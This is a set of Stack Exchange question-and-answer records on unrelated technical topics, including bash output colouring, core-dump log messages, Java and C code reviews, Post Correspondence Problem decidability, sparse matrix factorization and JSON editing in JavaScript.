_unix.57012 | Possible Duplicate: Customizing bash shell: Bold/color the command bash $ cat what-i-want I want the output to be in a different color. I'd like my commands to stand out among the output, without making the prompt overly long. I want to see commands and output in different colors. I understand how to manipulate prompt colors by setting PS1. Is there a way to change the color after I press Enter but before the command starts executing? | Coloring shell command and output differently | bash;colors;prompt | null
_unix.91126 | I noticed I have the following in my logs. I just am not sure as to how to go about figuring out how to fix or find out what is causing them and if they are serious.[582046.956291] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 18482 0 0 1379281138 e pipe failed[582346.769892] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 21093 0 0 1379281439 e pipe failed[582646.586134] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 23723 0 0 1379281739 e pipe failed[582946.390029] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 26342 0 0 1379282039 e pipe failed[583246.202851] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 29010 0 0 1379282340 e pipe failed[583546.018408] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 31620 0 0 1379282640 e pipe failed[583845.836688] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 1837 0 0 1379282940 e pipe failed[584145.645968] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 4416 0 0 1379283241 e pipe failed[584445.455705] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 7001 0 0 1379283541 e pipe failed[584745.266532] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 9600 0 0 1379283841 e pipe failed[585045.074399] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 12209 0 0 1379284141 e pipe failed[585344.885464] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 14790 0 0 1379284442 e pipe failed[585644.743818] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 17605 0 0 1379284742 e pipe failed[585944.511572] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 20183 0 0 1379285042 e pipe failed[586244.315990] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 22781 0 0 1379285343 e pipe failed[586544.123020] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 25385 0 0 1379285643 e pipe failed[586843.932084] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 27984 0 0 1379285943 e pipe failed[587143.742379] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 30608 0 0 1379286244 e pipe failed[587443.559349] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 799 0 0 1379286544 e pipe failed[587743.373027] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 3420 0 0 1379286844 e pipe failed[588043.175248] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 6031 0 0 1379287145 e pipe failed[588342.986730] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 8665 0 0 1379287445 e pipe failed[588642.795951] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 11279 0 0 1379287745 e pipe failed[588942.608088] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 13915 0 0 1379288045 e pipe failed[589242.420741] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 16728 0 0 1379288346 e pipe failed[589542.235065] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 19355 0 0 1379288646 e pipe failed[589842.061502] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 21998 0 0 1379288946 e pipe failed[590141.856687] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 24657 0 0 1379289247 e pipe failed[590441.700335] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 27307 0 0 1379289547 e pipe failed[590741.483298] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 29944 0 0 1379289847 e pipe failed[591041.286647] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 32554 0 0 1379290148 e pipe failed | Debugging dmesg logs | centos;rhel;debugging;core dump | null |
_codereview.70951 | In this specific situation there is a table with trackdata and a form to add rows. For the sake of clarity I won't include the view-related code here. The added rows are added to a LinkedList when appropriate. public class TrackDAO {private List<Track> tracks;private Connection con;public TrackDAO() { tracks = new LinkedList<Track>();}public void addTrack(Track track){ tracks.add(track);}I use a Singleton class for the Database connection.public void connect() throws Exception{ con = Database.getInstance().connect();}public void disconnect() { Database.getInstance().disconnect();}Files can be stored & retrieved locally. public void saveToFile(File file) throws IOException { File getFile = file; if (Utils.getExtension(getFile) == null){ String url = getFile.getAbsolutePath(); url += . + Utils.ml; getFile = new File(url); } FileOutputStream fos = new FileOutputStream(getFile); ObjectOutputStream oos = new ObjectOutputStream(fos); Track[] trackArray = tracks.toArray(new Track[tracks.size()]); oos.writeObject(trackArray); oos.close();}public void loadFromFile(File file) throws IOException { FileInputStream fis = new FileInputStream(file); ObjectInputStream ois = new ObjectInputStream(fis); try { Track[] trackArray = (Track[])ois.readObject(); tracks.clear(); tracks.addAll(Arrays.asList(trackArray)); } catch (ClassNotFoundException e) { e.printStackTrace(); } ois.close();}When the table view is being opened the data will load into the table. public void loadData() throws SQLException{ tracks.clear(); String sql = select id, artist, title, album, tuning, genre, url from track order by title; Statement selectStatement = con.createStatement(); selectStatement.executeQuery(sql); ResultSet results = selectStatement.getResultSet(); while(results.next()){ int id = results.getInt(id); String artist = results.getString(artist); String title = results.getString(title); String album = results.getString(album); String tuning = results.getString(tuning); String genre = results.getString(genre); String fileUrl = results.getString(url); Track track = new Track(id, artist, title, album, tuning, genre, fileUrl); tracks.add(track); System.out.println(track); } results.close(); selectStatement.close();}When the application is being closed the method will query the database for each id and check wether it has to update or insert the track. public void saveToDatabase()throws SQLException { String checkSql = select count(*) as count from track where id=?; PreparedStatement checkStatement = con.prepareStatement(checkSql); String insertSql = insert into track(id, artist, title, album, tuning, genre, url) values(?,?,?,?,?,?,?); PreparedStatement insertStatement = con.prepareStatement(insertSql); String updateSql = update track set artist=?, title=?, album=?, tuning=?, genre=?, url=? 
where id=?; PreparedStatement updateStatement = con.prepareStatement(updateSql); for(Track track: tracks){ int id = track.getId(); String artist = track.getArtist(); String title = track.getTitle(); String album = track.getAlbum(); String tuning = track.getTuning(); String genre = track.getGenre(); String url = track.getFileUrl(); checkStatement.setInt(1, id); ResultSet checkResult = checkStatement.executeQuery(); checkResult.next(); int count = checkResult.getInt(1); if (count == 0){ System.out.println(Inserting track with ID: + id); int col = 1; insertStatement.setInt(col++, id); insertStatement.setString(col++, artist); insertStatement.setString(col++, title); insertStatement.setString(col++, album); insertStatement.setString(col++, tuning); insertStatement.setString(col++, genre); insertStatement.setString(col++, url); insertStatement.executeUpdate(); System.out.println(insertStatement.toString()); } else { System.out.println(Updating track with ID: + id); int col = 1; updateStatement.setString(col++, artist); updateStatement.setString(col++, title); updateStatement.setString(col++, album); updateStatement.setString(col++, tuning); updateStatement.setString(col++, genre); updateStatement.setString(col++, url); updateStatement.setInt(col++, id); updateStatement.executeUpdate(); } } updateStatement.close(); insertStatement.close(); checkStatement.close();}Finally a track can be deleted by id.public void deleteTrack(int id) throws SQLException{ String checkSql = select count(*) as count from track where id=?; PreparedStatement checkStatement = con.prepareStatement(checkSql); checkStatement.setInt(1, id); ResultSet checkResult = checkStatement.executeQuery(); checkResult.next(); int count = checkResult.getInt(1); if(count!=0){ for(Iterator<Track> it=tracks.iterator(); it.hasNext(); ) { if(it.next().getId()==id) { System.out.println(it); it.remove(); break; } } System.out.println(Deleting track with ID: + id); String deleteSql = delete from track where id=?; PreparedStatement deleteStatement = con.prepareStatement(deleteSql); deleteStatement.setInt(1, id); deleteStatement.executeUpdate(); deleteStatement.close(); } checkStatement.close();}Any advice (on either part or whole) is welcome. | TrackDAO: what can be improved? | java;mysql;linked list;database;file system | first of all, your DAO class is not thread safe. Are you sure this behavior is the goal?connect() method creates a connection every time when it is called, and doesn't disconnect the previous one, this could cause a memory leakat the same method throwing Exception is in order to avoidat saveToFile() why do you need a new pointer to the file object? It's code smell, and the original file is not declared as final so you should replace it anytimeString url = getFile.getAbsolutePath();url += . + Utils.ml; should be replace with String url getFile.getAbsolutePath() + . + Utils.ml; It compiles to StringBuilder, so it's a cheaper operation then the 2 line version.at Track[] trackArray = tracks.toArray(new Track[tracks.size()]); you don't need to initialize the new array with the same size, 0 also will be okinstead of manually close resource(s) in Java 7 you should use an AutoCloseable with tryloadFromFile() is not so nice. For me it's annoying that loadFromFile() drops all of my Tracks previously! This is strange, and need to know this behavior to use this class. 
If you want to write clean code, you have to avoid things like that. e.printStackTrace() is not acceptable in business applications; if this is a hobby/school project it could be OK, otherwise it's a big mistake. loadData() -> tracks.clear(): same story. This class is not a clean DAO, it's a mix, because it does not just provide data access; it also contains other logic and holds data. I suggest splitting the class: create a thread-safe, stateless data access object and a container which handles the current Tracks. That way you can create an arbitrary number of containers, so you don't need to clear the tracks, for example. At saveToDatabase(), the existence check should be a separate method. Those SQL strings are a code smell. The if/else contains code duplication: you do almost the same thing with the two statements. checkStatement.close(): always close as soon as possible. Missing error handling: if an error occurs, the statements stay open. deleteTrack(): code duplication! checkStatement.close(): close ASAP. |
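To make the close-as-soon-as-possible and AutoCloseable points concrete, a sketch (editor's addition, not the reviewer's code) of how deleteTrack's JDBC handling could look inside the existing TrackDAO on Java 7+; the table, column, and field names come from the question, while dropping the separate existence check is an illustrative simplification:

public void deleteTrack(int id) throws SQLException {
    String deleteSql = "delete from track where id=?";
    // try-with-resources closes the statement even if executeUpdate throws,
    // which addresses the statements-stay-open-on-error point above.
    try (PreparedStatement deleteStatement = con.prepareStatement(deleteSql)) {
        deleteStatement.setInt(1, id);
        deleteStatement.executeUpdate(); // deleting a non-existent id simply affects 0 rows
    }
    // Keep the in-memory list consistent with the database.
    for (Iterator<Track> it = tracks.iterator(); it.hasNext(); ) {
        if (it.next().getId() == id) {
            it.remove();
            break;
        }
    }
}

The same pattern applies to the statements and result sets in loadData and saveToDatabase.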
_softwareengineering.210904 | I am trying my hand at Python, Django, jQuery, etc. to make a clone of the IMDb site. I have been doing web development for the past 10 months with the same technologies. In my spare time I want to develop a side project which may look good on a resume. I came up with an idea: make a clone of imdb.com. But after 2 weeks of development I stopped. Reasons: it's not different (why create another IMDb?), I'm not improving on it, and, let's face it, it will be substandard compared to the original. The point of the project is to showcase my skills in the above technologies, but at the same time I want it to be useful. | Is creating a clone of a site a good idea for a project? | web development | What you said reminds me of a quote from John Carmack on the subject: In the information age, the barriers [to entry into programming] just aren't there. The barriers are self imposed. If you want to set off and go develop some grand new thing, you don't need millions of dollars of capitalization. You need enough pizza and Diet Coke to stick in your refrigerator, a cheap PC to work on, and the dedication to go through with it. We slept on floors. We waded across rivers. — John Carmack I would say more important than the pizza, Diet Coke, and cheap PC is the dedication. If your heart isn't into it, you'll never make a decent program. And since making something which has already been done before is a strong demotivator, logically you should strive to do something which has never been done before. Oddly enough, it doesn't even have to be that particularly useful since at least for me, that doesn't seem to be so important. It just has to be something which nobody has attempted before. Of course, on a resume, flashy is better, but flashy is not as important as getting it done, so focus on developing something you want to see finished. You can always go back and improve on it (adding a better interface or whatever). When you're coding every night to finish something you enjoy working on, then you'll wind up with a marvelous little project that works and is impressive. If you quit half-way, then it doesn't matter how useful or flashy it would have been. It didn't finish.
_unix.331260 | First of all, I apologize if this is not the right place to ask this, but I couldn't think of anywhere else (maybe Stack Overflow?). Anyway, I'm looking for Optical Character Recognition (OCR) software to process my notes. The thing is that occasionally there is an equation in the middle, so I am looking for software that can process the text and the equations together and that I can run on my Linux system. Ultimately my goal is to create a LaTeX file from that, so it wouldn't hurt if the output were already in LaTeX, but I guess that would be asking too much. I couldn't find anything online that does this, but I think that's mainly because I'm not using the right search terms (English is not my main language). I did find this question, but it's from 4 years ago and I think things have changed since then. Does anybody know a way of doing this? | OCR software for equations to get a LaTeX file | images;latex;ocr | null
_cs.16357 | Given two ordered sets of words $a_1, a_2, ..., a_k$, $b_1, b_2, ..., b_k$ taking values in some discrete alphabet $A$, a solution to the PCP problem is a sequence $i_1, ..., i_n$ taking values in $1, 2, ..., k$ such that $a_{i_1}|a_{i_2}|...|a_{i_n}=b_{i_1}|b_{i_2}|...|b_{i_n}$, where $|$ means concatenation. $k$ can be called the length of the problem, $n$ the length of the solution, and if we let $w$ be the length of the largest word in $a_1, a_2, ..., a_k, b_1, b_2, ..., b_k$, then $w$ is called the width of the problem. I know that the PCP problem becomes decidable in several scenarios, for instance for bounded $n$, or if $A$ is unary, etc. On the other hand, for $k\geq 7$ PCP is still undecidable. My question is: is there any result known for bounded values of $w$? | Undecidability of the PCP problem with bounded width | computability;reference request;undecidability;decision problem | If $w$ is bounded and the alphabet size is bounded, then the number of possible words is bounded. Thus, there is only a finite number of essentially distinct instances, so the problem becomes a finite language, and is hence decidable. If you don't bound the alphabet, then you can encode any width $w$ by adding more letters, so the problem is the same as standard PCP, and hence undecidable.
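To spell out the finiteness step in the accepted answer (editor's note, using only the question's notation): over an alphabet of size $|A|$ there are at most $N=\sum_{i=1}^{w}|A|^i$ nonempty words of length at most $w$, hence at most $N^2$ distinct pairs $(a_j,b_j)$. Repeating a pair in an instance never changes whether a solution exists, because a solution may reuse any index arbitrarily often, so every instance is equivalent to one of at most $2^{N^2}$ instances without repeated pairs. The answer for each of these finitely many cases can in principle be fixed in a lookup table, which is what makes the bounded-$w$, bounded-alphabet problem decidable.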
_scicomp.16406 | For an $A=LU$ or $A=LDL^T$ factorization, bandwidth is preserved when there is no pivoting. This is true even for indefinite $A$; see this question. However, when there is pivoting, the band structure is destroyed, so fill-in can occur outside the band. I am curious whether there is any pivoting strategy that can still keep the sparsity of the factors within some bounds. | Is there an upper bound on fill-in for an indefinite triangular factorization? | sparse;factorization | null
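For context (editor's addition, not part of the original post): in the plain $LU$ case a classical bound is known. If $A$ has lower bandwidth $p$ and upper bandwidth $q$, then Gaussian elimination with partial pivoting, $PA=LU$, yields a $U$ with upper bandwidth at most $p+q$, and each column of $L$ has at most $p+1$ nonzero entries (see, e.g., Golub and Van Loan, Matrix Computations, the section on band Gaussian elimination). Whether an analogous bound holds for a symmetric indefinite $LDL^T$ factorization with Bunch-Kaufman-style pivoting is exactly what the question leaves open.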
_codereview.32040 | I'm a C++ programmer using SPOJ problems to learn C(99). This is my solution to the problem CMEXPR, where the goal is to read a valid expression (+, -, *, / only) from input and write it on output with superfluous parentheses removed.The code yields correct answer according to the online judge (got an AC). My question is whether there are any C++-isms in the code and if so, what would be a more idiomatic C way of expressing them. Basically, I don't want to write C++ code in C (just like I don't like C code written in C++).#include <stdbool.h>#include <stddef.h>#include <stdio.h>#include <stdlib.h>//#define TESTING#ifdef TESTING #define TEST_ASSERT(maCond) do { if (!(maCond)) { printf(%d: %s\n, __LINE__, #maCond); exit(1); } } while (0) #define TEST_ASSERT_MSG(maCond, maFormat, maMsg) \ do { \ if (!(maCond)) { printf(%d: %s: ' maFormat '\n, __LINE__, #maCond, (maMsg)); exit(1); } \ } while (0) #define IF_TESTING(...) __VA_ARGS__#else #define TEST_ASSERT(maCond) do {} while (0) #define TEST_ASSERT_MSG(maCond, maFormat, maMsg) do {} while(0) #define IF_TESTING(...)#endifenum ParsingContext{ CONTEXT_FIRST_TERM , CONTEXT_ADDITIVE_EXPRESSION , CONTEXT_NONFIRST_TERM};struct ExprNode{ char type; struct ExprNode *child[2];};struct NodeMemory{ struct ExprNode data[MAX_NODE_COUNT]; struct ExprNode *end;};struct ExprNode* createNode(struct NodeMemory *mem, char type){ struct ExprNode *node = mem->end++; TEST_ASSERT(mem->end - mem->data <= MAX_NODE_COUNT); node->type = type; IF_TESTING( node->child[0] = node->child[1] = NULL; ) return node;}struct ExprNode* moveToChild( struct NodeMemory * restrict mem , struct ExprNode * restrict node , size_t idxChild , char newParentType){ struct ExprNode * result = createNode(mem, newParentType); result->child[idxChild] = node; return result;}char readChar(const char * restrict * restrict in){ char c = **in; ++*in; return c;}void writeChar(char * restrict * restrict out, char c){ **out = c; ++*out;}struct ExprNode* parse( struct NodeMemory * restrict mem , const char * restrict * restrict in , struct ExprNode * restrict root , enum ParsingContext context){ TEST_ASSERT(root != NULL); bool skipStart = (context == CONTEXT_NONFIRST_TERM); // Left operand if (!skipStart) { switch (**in) { case '(': ++*in; root = parse(mem, in, root, CONTEXT_FIRST_TERM); TEST_ASSERT_MSG(**in == ')', %c, **in); ++*in; break; default: TEST_ASSERT_MSG( **in != ')' && **in != '+' && **in != '-' && **in != '*' && **in != '/' && **in != '\n' , %c, **in ); root->type = readChar(in); break; } } for (;;) { // Operator if (!skipStart) { switch (**in) { case '\n': case ')': TEST_ASSERT(root != NULL); TEST_ASSERT(root->type != '.'); return root; case '+': case '-': if (context == CONTEXT_NONFIRST_TERM) { TEST_ASSERT(root != NULL); TEST_ASSERT(root->type != '.'); return root; } TEST_ASSERT( (context == CONTEXT_ADDITIVE_EXPRESSION) == (root->type == '+' || root->type == '-') ); context = CONTEXT_ADDITIVE_EXPRESSION; root = moveToChild(mem, root, 0, readChar(in)); break; case '*': case '/': if (context == CONTEXT_ADDITIVE_EXPRESSION) { TEST_ASSERT(root->child[1]->type != '.'); root->child[1] = moveToChild(mem, root->child[1], 0, readChar(in)); root->child[1] = parse(mem, in, root->child[1], CONTEXT_NONFIRST_TERM); continue; // Parsed up to next operator or teminator } root = moveToChild(mem, root, 0, readChar(in)); break; default: TEST_ASSERT(false); break; } } skipStart = false; // Right operand switch (**in) { case '(': ++*in; root->child[1] = parse(mem, in, createNode(mem, '.'), 
CONTEXT_FIRST_TERM); TEST_ASSERT_MSG(**in == ')', %c, **in); ++*in; break; default: TEST_ASSERT_MSG( **in != ')' && **in != '+' && **in != '-' && **in != '*' && **in != '/' && **in != '\n' , %c, **in ); root->child[1] = createNode(mem, readChar(in)); break; } }}void serialiseTree(const struct ExprNode * restrict node, char * restrict * restrict out, char parentType, bool isLeftChild){ IF_TESTING( if (!node) { writeChar(out, 'N'); return; } ) TEST_ASSERT( parentType == '+' || parentType == '-' || parentType == '*' || parentType == '/' ); bool paren = false; switch (node->type) { case '+': case '-': paren = ( parentType == '*' || parentType == '/' || (parentType == '-' && !isLeftChild) ); break; case '*': case '/': paren = (parentType == '/' && !isLeftChild); break; default: writeChar(out, node->type); return; } if (paren) { writeChar(out, '('); } serialiseTree(node->child[0], out, node->type, true); writeChar(out, node->type); serialiseTree(node->child[1], out, node->type, false); if (paren) { writeChar(out, ')'); }}void createTree(struct NodeMemory *mem){ char expr[MAX_INPUT_SIZE + 2]; fgets(expr, sizeof(expr), stdin); const char *in = expr; if (*in == '\n') { fputs(expr, stdout); return; } struct ExprNode *root = parse(mem, &in, createNode(mem, '.'), CONTEXT_FIRST_TERM); TEST_ASSERT(*in == '\n'); TEST_ASSERT(root != NULL); char *out = expr; serialiseTree(root, &out, '+', true); *out++ = '\n'; *out = 0; TEST_ASSERT(out - expr < sizeof(expr)); fputs(expr, stdout);}void runCase(void){ struct NodeMemory mem; mem.end = mem.data; createTree(&mem);}int main(void) { int caseCount; fscanf(stdin, %d\n, &caseCount); for (int idxCase = 0; idxCase < caseCount; ++idxCase) { runCase(); } return 0;}Notes:I use ideone for developing this code, so that's why I'm using my own assertions instead of built-in assert(); an unusual termination wouldn't be too helpful.There's no error checking on input because in the context of the online judge, input correctness is guaranteed.NodeMemory is used to avoid overhead of dynamic allocation in presence of a known maximum problem size. | Parsing expressions using idiomatic C | c;parsing | These comments are not really related to writing idiomatic C, merely things I noticed in your code.Your handling of commas in lists is odd:enum ParsingContext { CONTEXT_FIRST_TERM , CONTEXT_ADDITIVE_EXPRESSION , CONTEXT_NONFIRST_TERM};struct ExprNode* moveToChild( struct NodeMemory * restrict mem , struct ExprNode * restrict node , size_t idxChild , char newParentType )I have never seen things written like that and don't see any advantageover the normal use:enum ParsingContext { CONTEXT_FIRST_TERM, CONTEXT_ADDITIVE_EXPRESSION, CONTEXT_NONFIRST_TERM};struct ExprNode* moveToChild(struct NodeMemory * restrict mem, struct ExprNode * restrict node, size_t idxChild, char newParentType)Your macros and their invocation should allow a semicolon to be placed whereexpected. 
Otherwise, syntax-aware editors can get confused and mess up the indentation: IF_TESTING( node->child[0] = node->child[1] = NULL; ) return node; Better to move the ; out of the bracket: IF_TESTING((node->child[0] = node->child[1] = NULL)); return node; Your asserts that check against a list of chars could be simpler with strchr (also I find the placement of the && here to be distracting, but I know some people like it that way): TEST_ASSERT_MSG( **in != ')' && **in != '+' && **in != '-' && **in != '*' && **in != '/' && **in != '\n' , %c, **in ); Neater (?): TEST_ASSERT_MSG(!strchr()+-*/\n, **in), %c, **in); I always find passing double pointers to be awkward and confusing, so I avoid it if possible. In this case it seems that you could read and write the input/output string directly to/from stdin/stdout as you go: replace readChar and writeChar with fgetc and fputc and pass stdin/stdout around instead of in and out (or just use the stdin/stdout globals). Note that using an assert to check for exceeding the available memory is incorrect. This should be an explicit if and exit.
_codereview.70936 | I am making an application in which the user has the ability to add, remove, and edit JSON data through DOM interaction. I have created a working JavaScript-only prototype that accepts certain variables to manipulate certain elements of the JSON data, although it is rather messy and seems rather impossible for me to implement with the DOM.Right now, my current structure is:Example Modding Session Modding Section A modA modAnother Modding Section A modA modA modAnother Modding Session Modding Section Another modAnother modAnother modModding Section Another modWhich has worked fine for me, however, my functions are very repetitive, which I would like to fix.var addSession = function(sessionName) { var selfSessionName = sessionName || undefined; if(!selfSessionName) return; moddingSessions.push({ name: selfSessionName, sections: [] });}Here you may start to see a pattern:var addSection = function(sectionName, sessionName) { var selfSessionName = sessionName || undefined, selfSectionName = sectionName || undefined; if(!selfSectionName || !selfSectionName) return; for(var i = 0; i < moddingSessions.length; i++) { if(moddingSessions[i].name === selfSessionName) { moddingSessions[i].sections.push({ name: selfSectionName, mods: [] }); } }}And here:var addMod = function(modContent, sectionName, sessionName) { var selfSessionName = sessionName || undefined, selfSectionName = sectionName || undefined, selfModContent = modContent || undefined; if(!selfModContent || !selfSectionName || !selfSectionName) return; for(var i = 0; i < moddingSessions.length; i++) { if(moddingSessions[i].name === selfSessionName) { for(var j = 0; j < moddingSessions[i].sections.length; j++) { if(moddingSessions[i].sections[j].name === selfSectionName) { moddingSessions[i].sections[j].mods.push(modContent); } } } }}As you can see, it works, but isn't very effective. I also have no idea how to handle each and every parameter when using this with DOM interaction. I hope there is a better way to achieve the same functionality. | Manipulate JSON data from the client with JavaScript | javascript;json | null |